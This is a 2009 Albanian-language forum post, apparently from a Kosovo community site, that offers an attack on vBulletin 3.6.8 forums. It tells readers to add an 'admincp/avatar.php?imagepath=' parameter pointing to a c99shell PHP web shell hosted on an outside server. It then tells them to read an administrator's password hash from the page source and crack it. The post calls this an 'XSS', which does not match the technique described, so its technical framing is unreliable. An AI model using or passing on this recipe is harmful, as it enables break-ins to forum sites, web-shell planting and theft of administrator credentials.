www.loqkat-ks.com
Behuni Pjes E komunitetit Ton edhe Ne Facebook Facebook

https://www.facebook.com/urimefestat

Ju faliminderit.

Vbulletin 3.6.8 Xxs

Shko poshtë

Vbulletin 3.6.8 Xxs

Mesazh nga σт¢нєє™ prej Mon Apr 27, 2009 5:21 pm

Qe nje xxs per vbulletin 3.6.8

Fillim shikojm ndonje forum 3.6.8 www.emri.com/forum ja shtojm kete mbas:

admincp/avatar.php?imagepath=http://no.spam.ee/~tonu/phpshell/c99shell.txt?

Pastaj nqs se ka te siguruar te qon ne hyrje te admincp shkojm aty me majten View Source , shtypim Ctrl+f kerkojm per

type

aty afer e keni hashin e njerit prej adminave atehere kerkojm ndonje Hash cracker te mire dhe funksionon met mira

σт¢нєє™
Super Moderator
Super Moderator

Postimet : 696
Points : 354083
Join date : 26/04/2009

Mbrapsht në krye Shko poshtë

Mbrapsht në krye


 
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi